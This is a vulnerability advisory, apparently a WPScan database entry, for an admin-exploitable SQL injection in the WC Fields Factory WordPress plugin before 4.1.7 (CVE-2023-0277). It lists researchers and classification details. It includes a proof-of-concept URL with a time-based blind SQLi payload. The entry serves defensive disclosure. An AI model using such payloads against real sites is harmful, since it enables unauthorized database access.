WordPress Plugin Vulnerabilities

WC Fields Factory < 4.1.7 - ShopManager+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=wccpf&action=wcff_clone_group&post=50+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&_wpnonce=a9a522960f

Affects Plugins

Plugin icon
wc-fields-factory
Fixed in 4.1.7

References

CVE
CVE-2023-0277
URL
https://bulletin.iese.de/post/wc-fields-factory_1-4-5

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Daniel Krohmer (Fraunhofer IESE), Kunal Sharma (University of Kaiserslautern)
Submitter
Daniel Krohmer
Submitter website
https://www.iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
69ffb2f1-b291-49bf-80a8-08d03ceca53b

Timeline

Publicly Published
2023-03-27 (about 1 years ago)
Added
2023-03-27 (about 1 years ago)
Last Updated
2023-07-07 (about 10 months ago)

Other

Published
Title
Published
2023-03-27
Title
ARMember < 4.0 - Unauthenticated SQLi
Published
2016-12-14
Title
ZM Gallery 1.0 – Authenticated Blind SQL Injection
Published
2014-08-01
Title
Event Registration <= 5.43 - SQL Injection
Published
2015-09-15
Title
CP Reservation Calendar <= 1.1.6 - Unauthenticated SQL Injection
Published
2023-12-28
Title
WP Adminify < 3.1.7 - Authenticated(Administrator+) SQL Injection